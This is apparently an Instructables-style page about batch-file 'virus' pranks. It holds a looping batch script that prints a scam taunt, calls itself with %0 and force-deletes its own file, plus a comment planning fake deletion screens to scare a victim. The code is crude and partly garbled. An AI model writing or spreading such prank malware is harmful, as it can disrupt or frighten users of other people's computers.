iImage Information

Due to the large amount of instructables I have seen here that detail ways to make batch file "Viruses", often times using the exact same code, I'm making this 'ible to show a comprehensive list of the ones that I know. Keep in mind, some of these can actually be dangerous if used, so be careful!
Some of these aren't exactly "pranks", and should only be looked at for educational purposes.
Disclaimer: I am not responsible if you wreck somebody's $2,000 water-cooled super awesome gaming computer, be it for a silly grudge, or accidental, using the code shown in this instructable.
Step 1Making a Batch File
iImage Information

So, in order to input the code described later, you're going to actually need a place to put it. For Batch, you can use the command prompt by going to start>run>cmd.exe, or making a ".bat" file in notepad. Make sure to save it as all files and with a ".bat" extension.
@echo on
:Top
color 02
prompt Hi, You Have Been SCAMMED XD
start color 0c
pause
prompt Hi, You Have Been SCAMMED XD
prompt Hi, You Have Been SCAMMED XD
prompt Hi, You Have Been SCAMMED XD
prompt Hi, You Have Been SCAMMED XD
prompt Hi, You Have Been SCAMMED XD
prompt Hi, You Have Been SCAMMED XD
prompt Hi, You Have Been SCAMMED XD
%0
rem ---------------------------------
rem Self Destruct
del /f /q %0
rem ---------------------------------
goto top
%0
(the pause is so to not destroy my computer whilst modding it XD)
...
My idea for this, is to open command prompt (pretend to be deleting stuff...), then open up another 8 command prompts (make them look like the one before, scrolling and pretend to delete stuff) and repeat the process....
ANY SUGGESTIONS WOULD BE APPRECIATED XDD